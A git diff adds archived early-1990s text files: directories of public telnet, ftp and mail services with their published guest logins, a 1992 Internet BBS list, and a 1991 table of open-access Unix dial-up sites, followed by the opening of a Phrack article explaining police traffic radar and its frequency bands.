+     telnet library.dartmouth.edu or 129.170.16.11
+     Login: connect dante
+     OFFERS: Divine Comedy and reviews.
+
+Distance Educational Data
+     telnet sun.nsf.ac.uk or telnet 128.86.8.7
+     (Login: janet  Hostname: uk.ac.open.acs.vax  Username: icdl)
+
+Document Site
+     ftp ocf.berkeley.edu or ftp 128.32.184.254
+     OFFERS: Many docs, including 5 purity tests, the Bible, lyrics.
+
+Earthquake Information
+     finger quake@geophys.washington.edu
+     OFFERS: Recent quake information (location, time, magnitude, etc.)
+
+E-Math
+     telnet 130.44.1.100 (Login: e-math  Password: e-math)
+     OFFERS: American Math Society sponsored BBS with software and reviews.
+
+FEDIX
+     telnet fedix.fie.com or telnet 192.111.228.1
+     Login: fedix
+     OFFERS: Information on scholarships, minority assistance, etc.
+
+Freenet
+     telnet freenet-in-a.cwru.edu or 129.22.8.82 (Cleveland)
+     telnet yfn.ysu.edu or 192.55.234.27 (Youngstown)
+     OFFERS: USA Today Headline News, Sports, etc.
+
+FTP Mail
+     mail ftpmail@decwrl.dec.com
+     Subject:(hit return) Body-of-letter: help (return) quit
+     OFFERS: ftp via e-mail
+
+Genetics Bank
+     mail gene-server@bchs.uh.edu
+     Subject: help
+     OFFERS: Genetic database accessible via e-mail.
+
+Geographic Server
+     telnet martini.eecs.umich.edu 3000 or 141.212.100.9 3000
+
+Gopher
+     telnet consultant.micro.umn.edu
+     Login: gopher
+     OFFERS: Access to many interesting features.
+
+Graf-Bib
+     mail graf-bib@decwrl.dec.com
+     Subject: help
+     Body-of-letter:  send index
+     OFFERS: Graphics bibliography
+
+Ham Radio Callbook
+     telnet marvin.cs.buffalo.edu 2000 or 128.205.32.4 2000
+     OFFERS: National ham radio call-sign callbook.
+
+INFO - Rutgers CWIS
+     telnet hangout.rutgers.edu 98 or 128.6.26.25 98
+     OFFERS: Dictionary, thesaurus, CIA world fact book, quotations database.
+
+Internet Resource Guide
+      ftp nnsc.nsf.net
+      OFFERS: Compressed/tar'd list of net resources in /resource-
+              guide.txt.tar.Z
+
+IRC Telnet Client
+     telnet bradenville.andrew.cmu.edu or 128.2.54.2
+     OFFERS: Internet Relay Chat access.
+
+Library of Congress
+     telnet dra.com or 192.65.218.43
+     OFFERS: COPY of Library of Congress
+     (Assumes terminal is emulating a vt100)
+
+List of Lists
+      ftp ftp.nisc.sri.com or ftp 192.33.33.22
+      mail mlol-request@wariat.nshore.ncoast.org
+      OFFERS: List of interest groups/e-mail lists in /netinfo/interest-groups.
+
+Lyric Server
+     ftp cs.uwp.edu
+     OFFERS: Lyrics (/pub/music/lyrics/files) in text files for anonymous ftp.
+
+Mail Server/User Lookup
+     mail mail-server@pit-manager.mit.edu
+     Usage: In body of mail message: send usenet-addresses/[name searching for]
+
+Melvyl
+     telnet melvyl.ucop.edu or 31.1.0.1
+     OFFERS: Access to various libraries.
+     Type "other" at prompt to see others.
+
+NASA Headline News
+     Finger nasanews@space.mit.edu
+     OFFERS: Daily press releases from NASA.
+
+NASA SpaceLink
+     telnet spacelink.msfc.nasa.gov or 128.158.13.250
+     OFFERS: Latest NASA news, including shuttle launches and satellite
+             updates.
+
+NED
+     telnet ipac.caltech.edu or telnet 131.215.139.35
+     Login: ned
+     OFFERS: NASA Extragalactic Database.
+
+NetLib
+     mail netlib@ornl.gov
+     Subject:(hit return)
+     Body-of-letter: send index
+     OFFERS: Math software.
+
+Oceanic Information Center
+     telnet delocn.udel.edu or telnet 128.175.24.1
+     Login: info
+
+Oracle
+     mail oracle@iuvax.cs.indiana.edu
+     OFFERS: The Usenet Oracle!
+     Mail with subject as "help" for more info.
+
+PENpages
+     telnet psupen.psu.edu or telnet 128.118.36.5
+     Login: PNOTPA
+     OFFERS: Agricultural info (livestock reports, etc.)
+
+SDDAS
+     telnet espsun.space.swri.edu 540 or telnet 129.162.150.99
+     OFFERS: SW Research Data Display & Analysis Center.
+
+SERVICES
+     telnet wugate.wustl.edu or 128.252.120.1
+     Login: services
+     OFFERS: Access to nearly every listed service!
+
+Software Server
+     telnet charlie.secs.csun.edu 5742 or 130.166.2.150 5742
+     OFFERS: Similar to Archie.
+     Type help for a list of commands.
+
+StatLib Server
+     mail statlib@lib.stat.cmu.edu
+     Mail with line: send index.
+     OFFERS: Programs, Datasets, etc. for statisticians.
+
+STIS
+     telnet stis.nsf.gov or 128.150.195.40
+     Login: public
+     OFFERS: Science & Technology Information System.
+
+Supreme Court Rulings
+     ftp ftp.cwru.edu
+     OFFERS: ASCII files of Supreme Court rulings in directory /hermes
+
+Usenet News MailServer
+     mail [newsgroup]@ucbvax.berkeley.edu
+     Allows you to post to a Usenet newsgroup via e-mail.  Useful if you have
+     read-only access to Usenet news.
+     Note: .'s become -'s  Ex. alt.test -> alt-test
+
+UNC BBS
+     telnet samba.acs.unc.edu or 128.109.157.30
+     Login: bbs
+     OFFERS: Access to Library of Congress and nationwide libraries.
+
+WAIStation
+     telnet quake.think.com or 192.31.181.1
+     Login: wais
+     OFFERS: Wide Area Information Service
+     FTP think.com for more info.
+
+Weather Service
+     telnet madlab.sprl.umich.edu 3000 or 141.212.196.79 3000
+     OFFERS: City/State forecasts, ski conditions, earthquake reports, etc.
+
+World-Wide Web
+     telnet info.cern.ch or telnet 128.141.201.74
+     OFFERS: Information service with access to various documents, lists, and
+     services.
+
+  * NOTE: NO LOGIN NAMES OR PASSWORDS ARE REQUIRED UNLESS STATED OTHERWISE! *
+    If it prompts you for a login name, you did something wrong, or are not
+        running on a machine that the system you telnetted to supports!
+_______________________________________________________________________________
+
+   +++++ Zamfield's Wonderfully Incomplete, Complete Internet BBS List +++++
+
+FOREWORD
+~~~~~~~~
+The following list has been compiled with the help of the wonderfully generous
+crowd of folks who associate with Internet or UseNet.  I owe them many thanks
+and please keep the info coming.
+
+I, and many others, have a few things to say about these BBSes in general.  So
+bear with me, or skip ahead, but do take a look later.
+
+1). These BBSes are provided as a service to anyone on Internet.  Not just you.
+2). While you may not directly pay for these services someone does.
+3). You are a guest, and please keep that in mind while using these BBSes.
+
+Okay, that wasn't so bad after all.
+
+Most of these BBSes offer services unique to BBSing.  Some offer small scale
+versions of standard Internet services.  Keep in mind that mail or articles
+posted on BBSes do not reach everyone in the world, and if you can get to
+UseNet, you will probably find better responses.  Most of the files on these
+BBSes can be found by anonymous FTP, so don't tie up the system with files if
+you have FTP.  Do be considerate on these BBSes, some people aren't using
+telnet or rlogin to get to these, some people still dial numbers with modems at
+their homes. :-)
+
+For users of JANET (UK), you may access these BBSes through first connecting to
+UK.AC.NFSNET-RELAY.TELNET or PAD.UK.AC.NFSNET-RELAY.TELNET.  Likewise, users of
+Internet can get to JANET by telnet SUN.NFS.AC.UK, login as janet.
+
+Zamfield@Dune.EE.MsState.Edu
+
+==============================================================================
+2/6/92
+
+NAME   ADDRESS   LOGIN  BBS Software
+------------------------------------------------------------------------------
+
+AfterFive  winner.itd.com 9999
+ --  128.160.2.248 9999
+
+ --  Hours:  5 p.m. to 8 a.m. CST.  Please no logins during the day.
+
+ --  MUCK - enhanced tinymuck2.2.3d-beta.  Based on Bourbon Street, New
+     Orleans.  May not be appropriate for all ages, especially very young
+     children as the database is rather graphic in section describing strip
+     tease, and bars.
+
+ --  BBS is Citadel like Quartz and Grind.  No HotKeys though.  Supports 59
+     concurrent users.
+
+ --  This site is running on a very fast machine, but you might experience
+     network delays.  Contact Howard, Darrel, Trish, Wolvercuss, Akbaar or
+     Captain, wizards, if you wish to work on any aspect of After-Five.
+
+BadBoy's Inn  130.18.80.26  bbs  Pirate 2.0
+ --  badboy.itd.msstate.edu
+
+ --  Boards, Talk, Chat, Mail
+ --  Test site for new Pirate Software.
+ --  Pirate 2.0 kicks, if it would work all the time!
+
+Campus_d  35.204.192.2  LOGIN CAMPUS_D
+ --  umde.dbrn.umich.edu
+
+ --  Currently down and contemplating permanent removal.  (8/2/91)
+ --  Send comments/condemnations/pleading/apologizing/reminiscing/etc. to
+     DEN@UMDE.DBRN.UMICH.EDU
+
+Cimarron (in Spanish) bugs.mty.itesm.mx bbs  Pirate 1.0
+ --  131.178.17.60
+
+ --  Nice BBS, too bad it is all in Spanish.  Good place to get acquainted with
+     if you are trying to learn Spanish, lots of conversations to look at.
+     Cimarron means Wild Dog or Untamed.
+
+ --  This BBS seems to be a limited access site.  I have gained access only
+     during late hours CST.  I will try to get more info on this.
+
+Cleveland Free-Net 129.22.8.75 (cwns16.ins.cwru.edu) CWRUBBS
+ --  129.22.8.76 (cwns9.ins.cwru.edu)
+ --  129.22.8.82 (cwns10.ins.cwru.edu)
+ --  freenet-in-a.cwru.edu
+ --  freenet-in-b-cwru.edu
+ --  freenet-in-c-cwru.edu
+
+ --  Usenet, Internet, MUD, USA Today Online.  Local mail, and Interest Groups.
+
+CueCosy   cue.bc.ca  cosy  Cosy 4.0
+ --  134.87.11.200
+
+ --  Conferences and Topics, EAN Mail, Usenet, FTP, downloads Kermit & Xmodem,
+     Online Unix course, some local files.
+
+Cybernet Waffle BBS 131.91.80.13  bbs  Waffle
+ --  shark.cs.fau.edu
+
+ --  Nice BBS, but I still haven't gotten word on whether I have been validated
+     or not.  And no response to my mail either.  Lots of conferences, and
+     Magpie Chat.  Information for Floridians, GNU, computers, alternate
+     PUBNET, recreational, science, social, Unix-PC; unsure about files, but
+     still nice.
+
+Delft University BBS 130.161.180.68  BBS
+ --  tudrwa.tudelft.nl
+
+ --  In Holland, mostly Dutch.
+ --  Files, messages, chat areas
+
+Endless Forest  137.48.1.5 2001
+ --  forest.unomaha.edu 2001
+
+ --  Boards, E-mail.  Reminds me of WWIV BBS.
+
+Hall of Doom  servax.fiu.edu
+ --  131.94.64.2
+
+ --  login as WEATHER, passwd WEATHER
+ --  select 666
+ --  login as new.
+
+Heartland Peoria Illinois FreeNet
+ --  136.176.10.10  fnguest
+ --  heartland.bradley.edu
+
+ --  Mail, Public Forum, Recreation, Calendar, Social services, Senior center,
+     Teen center, Local job & government information, Legal, Medical, Tax, &
+     Invest/Banking Forums SIGs, Library, Home & Garden, Science & Tech, &
+     Education Forums.
+
+Hewlett-Packard BBS hpcvbbs.cv.hp.com
+ --  15.255.72.16
+
+ --  has tech help, and 48SX files/programs.
+
+IDS DataForum  192.67.241.11  guest
+ --  ids.jvnc.net
+
+ --  IDS DataForum is a public access system run on a DEC VAX.  It is menu
+     driven, supports VT100, and ANSI graphics.
+
+ --  Features, TELNET, FINGER, Weather Underground, Ham Callsign Book.  Adds
+     Internet Mail (VMS Mail).
+
+ --  Includes Entertainment, such as, International MUDs, local-only games,
+     CONQUEST & GALACTIC TRADER, and CB Simulator for CHATS.
+
+ --  RIME, PC-BBS messaging network, Usenet NEWS with "nearly" full newsfeed.
+
+ --  DialOut service, online Game Developer Conference, and BBS software
+     available as well.
+
+ --  Local access at (401)-884-9002, (V.32, Telebit/PEP, USR HST, V.42bis).
+
+ --  More info at ids-info@idsvax.ids.com
+
+ISCA    isca01.isca.uiowa.edu iscabbs  DOC (Citadel)
+ --  grind.isca.uiowa.edu
+ --  128.255.19.233
+ --  128.255.19.175
+
+Mars Hotel  Mars.EE.MsState.Edu bbs  Pirate
+ --  130.18.64.3
+
+ --  Boards, Talk, Chat, IRC, Mail.
+ --  Fairly extensive files,
+ --  ftp'able, Kermit, XYZmodems,
+
+ --  Died recently due to irreparable hardware failures.  This system will
+     probably remain down for a year or so, or indefinitely if another machine
+     is not found for it.  I will continue to update its status if any changes
+     occur.
+
+ --  Mars is/was a Sparc 4/110 that lost a Mongo chip.  The EE department might
+     consider ordering a replacement, but has no idea where to get one.
+     Information will be forwarded if sent to Zamfield@dune.ee.msstate.edu.
+     Also, if anyone has a spare 4/110 the EE department said that would do
+     just fine.
+
+ --  Further information, offerings, etc, contact Zamfield@dune.ee.msstate.edu
+     and I will facilitate the rebirth of Mars if possible.
+
+National Education BBS testsun3.nersc.gov bbs  Pirate
+ --  shadowfax.nersc.gov
+ --  128.55.128.183
+ --  128.55.128.64
+
+ --  Boards, Talk, Chat, Mail.'source' file section, but no files.  HAS GONE
+     PRIVATE, or so I have been told.  (9/22/91)
+
+Netcom   netcom.netcom.com guest + <CR> at passwd
+ --  192.100.81.100
+
+ --  Full Unix service.  Money for access.  $15.50/month ($17.50 for invoiced
+     billing)
+ --  (408) 241-9760/9794 (San Jose, CA) and
+ --  (415) 424-0131 (Palo Alto, CA).
+
+Nyx BBS   isis.cs.du.edu  new
+ --  130.253.192.9
+
+ --  Full news feed, Local downloads, shell access (with validation), and Ftp.
+     It is a completely free public access Unix system fun by the University of
+     Denver's Math and Computer Science Department.
+
+ --  Sysop: Professor. Andrew Burt.  The system is run by donations on a
+     donated Pyramid 90x with a homebrew menuing system
+
+Olajier   129.31.22.7  Olajier <passwd Olajier>
+ --  leo.ee.ic.ac.uk
+
+ --  Capitals are important for both the login and passwd.  This BBS is at
+     Imperial College in London.
+
+OuluBox (Finnish) tolsun.oulu.fi  box
+ --  130.231.96.16
+
+ --  Can set English as preferred language, said to switch to Finnish at the
+     most inconvenient time.  IRC.
+
+The Picayune  star96.nodak.edu 20
+ --  star24.nodak.edu or star12.nodak.edu for slower speeds.
+ --  134.129.107.131
+
+ --  North Dakota Higher Education Computer Network.
+ --  Limited net news, file areas, tetris online, local e-mail.
+
+ --  A 386 running unix, 2 80 meg drives, 600 users give or take a few.
+
+Quartz   Quartz.Rutgers.Edu bbs  Citadel
+ --  128.6.60.6
+
+ --  Rooms/Boards.
+ --  Suggest MUD to chat.
+
+Samba North Carolina 128.109.157.30  bbs  Modified XBBS
+ --  samba.acs.unc.edu
+ --  (919)-962-9911
+
+ --  Offers vi, emacs, rn, NEWS, MAIL, local messaging, SIGS, Conferencing,
+     Files (Kermit/FTP), & INFO limited NewsFeed (8/2/91).
+
+Softwords COSY  softwords.bc.ca  cosy  Cosy
+ --  134.87.11.1
+
+SpaceLink BBS  spacelink.msfc.nasa.gov
+ --  128.158.13.250
+
+Spies In The Wires doomsday.spies.com bbs
+ --  130.43.2.220
+
+ --  Full UseNet NewsFeed, Posting to UseNet.
+ --  IRC (for validated users).
+
+ --  Appears to have shut down. 12/6/91
+
+TriState Online  129.137.100.1  visitor  FreeNetIII
+ --  tso.uc.edu
+
+ --  new FreeNet site.
+
+Virginia Tech Cosy vtcbx.csn.vt.edu cosyreg
+ --  128.173.5.10  bbs (for list)
+
+ --  Virginia Tech Conferencing System.  Offers local conferencing, up to date
+     listing of local BBSes and read only Usenet NEWS.  Tons of messages.
+
+Youngstown Free-Net yfn.ysu.edu  visitor
+ --  192.55.234.27
+
+Unknown   centaur.ucsd.edu bbs
+ --  128.54.16.14
+
+The World  world.std.com  new
+ --  192.74.137.5
+
+ --  Public access Unix system.  19.2, 9600, 2400, & 1200 baud modem
+     connections.  3 GB disk storage.  CompuServe Packet Network access and
+     SLIP connection up to T1.
+
+ --  Signup, dial 617-739-WRLD, type new.  Basic rates are $2/hr 24 hrs/day and
+     $5 monthly fee.  20/20 plan, $20 for 20 hrs, including monthly fee.  Also
+     available from Compuserve Packet Network.  $5.60 surcharge is added to
+     monthly bill.  Further info at staff@world.std.com
+
+ --  E-mail to Internet, UUCP, BITNET, CSNET, EUNET, JANET, JUNET, Fidonet,
+     BIX, Compuserve, Applelink and MCImail.
+
+ --  USENET, ClariNet, Electronic Mailing Lists, Chatting, Unix Software, GNU
+     Software, Games, Online Book Initiative, AlterNet Access, Internet.
+
+- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
+
+SERVICES
+~~~~~~~~
+The following is a list of useful services that most BBSers are interested in.
+I have not checked any of these except Archie.  If you have more info about
+these or if you know of other to add, please mail me:
+
+Zamfield@Dune.EE.MsState.EDU.
+
+==============================================================================
+
+Service   Address   Login
+------------------------------------------------------------------------------
+
+Archie   quiche.cs.mcgill.ca archie
+ --  132.206.2.3
+
+Cheeseplant's House 137.205.192.5 2001
+ --  orchid.csv.warwick.ac.uk
+
+ --  This is a dedicated Chat program run by Daniel Stephens in Warwick
+     University in England.
+
+Cat Chat  137.205.192.5 2000
+
+ --  Another ChatServer.  See Cheeseplant's House.
+
+DDN Network Information Center
+ --  nic.ddn.mil
+ --  192.67.67.20
+
+ --  TACNEWS, WHOIS Server, NIC
+
+
+GeoServer  Martini.eecs.umich.edu 3000
+ --  141.212.100.9
+
+IRC Client  bradenville.andrew.cmu.edu
+ --  128.2.54.2
+
+ --  not all IRC commands supported.
+
+Library Systems  ->FTP<- vaxb.acs.unt.edu
+
+ --  This site contains a huge, 100-150 page, guide to Internet libraries.
+     The file is under the library directory.  Send thanks and responses to
+     Billy Barron, BILLY@vaxb.acs.unt.EDU.
+
+Lyric Server  ->FTP<- cs.uwp.edu
+
+ --  These files are available via anonymous ftp.  This is not really a Telnet
+     service, but it is nice to know about so I included it.
+
+National Ham Radio Call-Sign Callbook
+ --  128.205.32.4 2000
+ --  marvin.cs.Buffalo.Edu
+
+ --  I am very impressed with this service I heard that people had trouble
+     logging into this site, but I never encountered a login prompt, I just
+     started using it.
+
+NCSU Services  ccvax1.cc.ncsu.edu INFO or PUBLIC
+ --  128.109.153.4
+
+Network Information Service (Univ. of California at Berkeley)
+ --  mailhost.berkeley.edu 117
+ --  128.32.136.9, 117
+ --  128.32.136.12, 117
+ --  128.32.206.9 117
+ --  128.32.206.12 117
+
+OCEANIC   128.175.24.1
+ --  delocn.udel.edu
+
+ --  Ocean info center, from the U. of Delaware.  Contains technical and
+     scientific info on oceanic research.  DOS software for viewing
+     oceanographic graphics.  Type <$> to logout (no brackets).
+
+Slugnet chat system cons1.mit.edu
+ --  18.80.0.88, 2727
+
+ --  sorta like IRC.
+
+UM-Weather Service madlab.sprl.umich.edu 3000
+ --  141.212.196.79 3000
+
+Vatech Server  128.173.16.6
+ --  vtcbx.cc.vt.edu
+
+WAIS server  hub.nnsc.nsf.net wais
+ --  192.31.103.7
+
+ --  Gives access to online documents.  More info can be obtained from
+     THINK.COM.
+
+
+Thomas A. Kreeger (Zamfield@Dune.EE.MsState.Edu)
+_______________________________________________________________________________
+
+                              nixpub short listing
+              Open Access UNIX (*NIX) Sites [both Fee and No Fee]
+                             [ September 13, 1991 ]
+
+
+Legend: fee/contribution ($), no fee (-$), hours (24), not (-24)
+        shell (S), USENET news (N), e-mail (M), multiple lines (T)
+        Telebit PEP speed on main number (+P), Telebit on other line[s] (P)
+        Courier HST 9600 bps on main number (+H), Courier on other line[s] (H)
+        V.32 on main number (+V), V.32 on other line[s] (V)
+        anonymous uucp (A), archive site ONLY - see long form list (@)
+
+Updated
+Last   Telephone #        Sys-name  Location        Baud        Legend
+-----  ------------       --------  -----------     -------     ---------
+08/91  201-759-8450^      tronsbox  Belleville   NJ 3-96        24 -$ MN+PST
+04/91  203-661-2873       admiral   Greenwich    CT 3/12/24/96  24 -$ AHMN+PT+V
+09/91  206-328-4944^      polari    Seattle      WA 12          24 $ MNPST
+05/91  206-367-3837^      eskimo    Seattle      WA 3/12/24     24 $ MNST
+04/91  209-952-5347       quack     Stockton     CA 3/12/24/96  24 $ MN+PS
+12/90  212-420-0527^      magpie    NYC          NY 3/12/24/96  24 -$ APT
+12/90  212-431-1944^      dorsai    NYC          NY 3/12/24     24 $ MNT
+12/90  212-675-7059^      marob     NYC          NY 3/12/24/96  24 -$ APT
+12/90  213-397-3137^      stb       Santa Monica CA 3/12/24/96  24 -$ A+PS
+01/91  215-336-9503^      cellar    Philadelphia PA 3/12/24/96  24 $ +HMN+V
+06/91  215-348-9727       lgnp1     Doylestown   PA 3/12/24/96  24 -$ AMN+P
+12/90  216-582-2460^      ncoast    Cleveland    OH 12/24/96    24 $ MNPST
+07/91  217-789-7888       pallas    Springfield  IL 3/12/24/96  24 $ HMNSTV
+07/91  219-289-0282       nstar     Notre Dame   IN 24/96       24 $ +HMNPST+V
+08/91  301-625-0817       wb3ffv    Baltimore    MD 12/24/96    24 -$ AHNPT+V
+07/91  303-871-4824^      nyx       Denver       CO 3/12/24     24 -$ MNST
+08/91  312-248-0900       ddsw1     Chicago      IL 3/12/24/96  24 $ AMNPSTV
+04/90  312-283-0559^      chinet    Chicago      IL 3/12/24/96  24 $ HNPT
+10/89  312-338-0632^      point     Chicago      IL 3/12/24/96  24 -$ HNPST
+09/90  312-714-8568^      gagme     Chicago      IL 12/24       24 $ MNS
+06/90  313-623-6309       nucleus   Clarkston    MI 12/24       24 -$ AM
+10/90  313-994-6333       m-net     Ann Arbor    MI 3/12/24     24 $ T
+08/89  313-996-4644^      anet      Ann Arbor    MI 3/12        24 $ T
+08/89  314-474-4581       gensis    Columbia     MO 3/12/24/48/ 24 -$ MS
+08/90  401-455-0347       anomaly   Esmond       RI 3/12/24/96  24 -$ MN+PS
+09/91  407-299-3661^      vicstoy   Orlando      FL 12/24       24 -$ MNS
+06/91  407-438-7138^      jwt       Orlando      FL 12/24/96    24 -$ MNP
+11/90  408-241-9760^      netcom    San Jose     CA 12/24/96    24 $ MNPST
+09/89  408-245-7726^      uuwest    Sunnyvale    CA 3/12/24     24 -$ N
+08/91  408-423-9995       cruzio    Santa Cruz   CA 12/24       24 $ MNPT
+07/91  408-458-2289       gorn      Santa Cruz   CA 3/12/24/96  24 -$ MN+PST
+10/89  408-725-0561^      portal    Cupertino    CA 3/12/24     24 $ MNT
+12/90  408-739-1520^      szebra    Sunnyvale    CA 3/12/24/96  24 -$ MN+P
+07/91  408-867-7400^      spies     Saratoga     CA 12/24       24 -$ MNST
+09/91  408-996-7358^      zorch     Cupertino    CA 12/24/96    24 $ MNPT
+06/91  412-431-8649^      eklektik  Pittsburgh   PA 3/12/24     24 $ MNST
+06/91  414-241-5469^      mixcom    Milwaukee    WI 12/24/96    24 $ MNST
+09/91  414-734-2499       edsi      Appleton     WI 3/12/24     24 $ MN
+01/91  415-223-9768^      barbage   El Sobrante  CA 3/12/24/48  24 -$
+11/90  415-294-8591       woodowl   Livermore    CA 12/24/19.2  24 -$ MN+P
+11/89  415-332-6106^      well      Sausalito    CA 12/24       24 $ MNST
+06/91  415-623-8652^      jack      Fremont      CA 3/12/24/96  24 -$ MN+PST
+06/91  415-826-0397^      wet       San Francisc CA 12/24       24 $ MNPSTV
+04/91  415-949-3133^      starnet   Los Altos    CA 3/12/24/96  24 $ MNPSTV
+05/90  415-967-9443^      btr       Mountain Vie CA 3/12/24     24 $ HMNPSTV
+11/89  416-452-0926       telly     Brampton     ON 12/24/96    24 $ MN+P
+12/88  416-461-2608       tmsoft    Toronto      ON 3/12/24/96  24 $ MNS
+02/90  502-957-4200       disk      Louisville   KY 3/12/24     24 $ MNST
+08/91  503-254-0458^      bucket    Portland     OR 3/12/24/96  24 -$ MN+PST+V
+02/91  503-297-3211^      m2xenix   Portland     OR 3/12/24/96  24 -$ MN+PST+V
+03/91  503-640-4262^      agora     PDX          OR 12/24/96    24 $ MNST
+05/90  503-644-8135^      techbook  Portland     OR 12/24       24 $ MNST
+09/91  508-655-3848       unixland  Natick       MA 12/24/96    24 $ HMNPSTV
+06/91  512-346-2339^      bigtex    Austin       TX 96          24 -$ A+PS
+10/89  513-779-8209       cinnet    Cincinnati   OH 12/24/96    24 $ MN+PS
+08/90  514-844-9179       tnl       Montreal     PQ 3/12/24     24 -$ MS
+01/90  517-487-3356       lunapark  E. Lansing   MI 12/24       24 -$
+12/88  518-346-8033       sixhub    upstate      NY 3/12/24     24 $ MNST
+07/91  602-293-3726       coyote    Tucson       AZ 3/12/24/96  24 -$ MN+P
+07/91  602-649-9099^      telesys   Mesa         AZ 12/24/96    24 $ AMN+PS
+12/90  602-941-2005^      xroads    Phoenix      AZ 12/24       24 $ NT
+11/90  604-576-1214       mindlink  Vancouver    BC 3/12/24/96  24 $ HMNPT
+12/90  604-753-9960       oneb      Nanaimo      BC 3/12/24/96  24 $ MN+PT
+08/89  605-348-2738       loft386   Rapid City   SD 3/12/24/96  24 $ MN+PS
+04/91  606-263-5106       lunatix   Lexington    KY 3/12/24     24 -$ MNST
+08/88  608-273-2657       madnix    Madison      WI 3/12/24     24 -$ MNS
+09/90  612-473-2295^      pnet51    Minneapolis  MN 3/12/24     24 -$ MNT
+12/90  613-237-0792       latour    Ottawa       ON 3/12/24/96  24 -$ AMN+PS+V
+12/90  613-237-5077       micor     Ottawa       ON 3/12/24/96  24 -$ MN+P
+06/91  614-868-9980^      bluemoon  Reynoldsburg OH 3/12/24/96  24 -$ +HMNPT
+07/91  615-288-3957       medsys    Kingsport    TN 12/24/96    24 -$ AN+P
+04/91  615-896-8716       raider    Murfreesboro TN 12/24/96    24 -$ MNST+V
+11/90  616-457-1964       wybbs     Jenison      MI 3/12/24/96  24 -$ MN+PST
+06/91  617-471-9675^      fcsys     Quincy       MA 3/12/24/96  24 -$ AMN+V
+12/90  617-739-9753^      world     Brookline    MA 3/12/24/96  24 $ MNPST
+01/90  619-259-7757       pnet12    Del Mar      CA 3/12/24/96  24 -$ MNPT
+07/88  619-444-7006^      pnet01    El Cajon     CA 3/12/24     24 $ MNST
+06/91  703-239-8993^      tnc       Fairfax Stat VA 3/12/24/96  24 -$ MNPT
+12/89  703-281-7997^      grebyn    Vienna       VA 3/12/24     24 $ MNT
+05/91  708-833-8126^      vpnet     Villa Park   IL 12/24/96    24 -$ MN+PST
+06/91  713-438-5018^      sugar     Houston      TX 3/12/24/96  24 -$ N+PT
+08/91  713-568-0480^      taronga   Hoston       TX 3/12/24     24 -$ MNST
+10/89  713-668-7176^      nuchat    Houston      TX 3/12/24/96  24 -$ MN+PS
+04/91  714-278-0862       alchemy   Corona       CA 12/24/96    24 -$ MN+PS
+01/91  714-635-2863^      dhw68k    Anaheim      CA 12/24/96    24 -$ MN+PST
+12/90  714-821-9671^      alphacm   Cypress      CA 12/24/96    24 -$ A+PT
+12/90  714-842-5851^      conexch   Santa Ana    CA 3/12/24     24 $ AMNS
+01/91  714-894-2246^      stanton   Irvine       CA 3/12/24     24 $ MNS
+03/90  717-657-4997       compnect  Harrisburg   PA 3/12/24     24 -$ MNT
+06/91  718-424-4183^      mpoint    New York     NY 3/12/24/96  24 $ +HMNS+V
+04/91  718-832-1525^      panix     New York Cit NY 12/24/96    24 $ MNPST
+12/89  719-632-4111       oldcolo   Colo Spgs    CO 12/24/96    24 $ HMNT
+12/90  808-735-5013       pegasus   Honolulu     HI 12/24/96/19 24 -$ MN+PST+V
+12/90  812-333-0450       sir-alan  Bloominingto IN 12/24/19.2/ 24 -$ A+HMPTV
+08/91  812-421-8523       aquila    Evansville   IN 12/24       24 $ AM
+06/91  818-401-9611^      abode     El Monte     CA 24/96       24 $ MN+PST
+03/91  900-468-7727       uunet     Falls Church VA 3/12/24/96  24 $ AMN+PT+V
+07/91  904-456-2003       amaranth  Pensacola    FL 12/24/96    24 -$ MN+P
+09/91  906-228-4399       lopez     Marquette    MI 12/24       24 $ MN
+06/91  908-297-8713^      kb2ear    Kendall Park NJ 3/12/24/96  24 -$ AMNS+V
+05/90  908-846-2460^      althea    New Brunswic NJ 3/12/24     24 -$ MNS
+08/91  916-649-0161^      sactoh0   Sacramento   CA 12/24/96    24 $ MN+PSTV
+01/91  919-248-1177^      rock      RTP          NC 3/12/24/96  24 $ MN
+10/89  919-493-7111^      wolves    Durham       NC 3/12/24     24 $ MNS
+08/91  +33-1-40-35-23-49  gna       Paris        FR 12          24 -$ AMN+PT+V
+11/90  +39-541-27858      xtc       Rimini (Fo)  IT 3/12/24/96  24 -$ HN+PT
+09/91  +41-61-8115492     ixgch     Kaiseraugst  CH 3/12/24     24 -$ AMN+P
+02/91  +44-81-853-3965    dircon    London       UK 3/12/24     24 $ MN
+11/90  +44-81-863-6646    ibmpcug   Middlesex    UK 3/12/24/96  24 $ MST+V
+06/91  +49-30-691-95-20   scuzzy    Berlin       DE 3/12/24/96  24 -$ A+HS
+06/91  +49-8106-34593     gold      Baldham      DE 3/12/24/96  24 -$ AHMN+PT+V
+01/91  +64-4-642-260      cavebbs   Wellington   NZ 12/24       24 -$ MNT
+11/90  +64-4-895-478      actrix    Wellington   NZ 3/12/24/96  24 $ +HMNST
+02/91  +64-9-645-593      delphi    Auckland     NZ 3/12/24/96  24 -$ MNT+V
+02/91  +64-9-817-3725     kcbbs     Auckland     NZ 12/24/96    24 -$ MN+PTV
+
+NOTE:  ^ means the site is reachable using PC Pursuit.
+_______________________________________________________________________________
diff --git a/phrack38/6.txt b/phrack38/6.txt
new file mode 100644
index 0000000..4e75b3c
--- /dev/null
+++ b/phrack38/6.txt
@@ -0,0 +1,301 @@
+                               ==Phrack Inc.==
+
+                 Volume Four, Issue Thirty-Eight, File 6 of 15
+
+      _____                 BEATING THE RADAR RAP                 _____
+     /   / \                                                     /   / \
+    (  5/5  )         Part 2 of 2 : "The Technical Side"        (  5/5  )
+     \_/___/                                                     \_/___/
+                                 by Dispater
+ ______________________________________________________________________________
+|              |
+| Introduction |  Welcome to the second installment in this series where we
+|______________|  will briefly explore some of the technical sides to the
+                  operations, error analysis of the police traffic RADAR
+unit, the basics of how this technology was developed, then how it was
+implemented, a list of common RADAR errors, and finally the technical analysis
+of various types of traffic RADAR by National Highway Safety Administration.
+
+RADAR stands for Radio Detecting And Ranging.  A traffic speed RADAR works
+under the principle of physicals called the "Doppler effect."  This theory
+means that when a signal is reflected off of an object moving toward you, the
+signal will be at a higher frequency when it is closer to you than when the
+object is farther away or at the initial position.  So the "Doppler effect" is
+THE basis for the use of the traffic speed RADAR.
+
+Right now in the United States, there are three bands that are allocated by the
+Federal Communications Commission (FCC) for "field disturbance sensors."  These
+three bands have non-technical names, and all operate in the GigaHertz range
+(GigaHertz is a measure of frequency, i.e. 1 GHz = 1 billion cycles per
+second).  The following is a list of the RADAR bands (as a point of reference
+FM radio modulates at 0.088 GHz to 0.108 GHz).
+
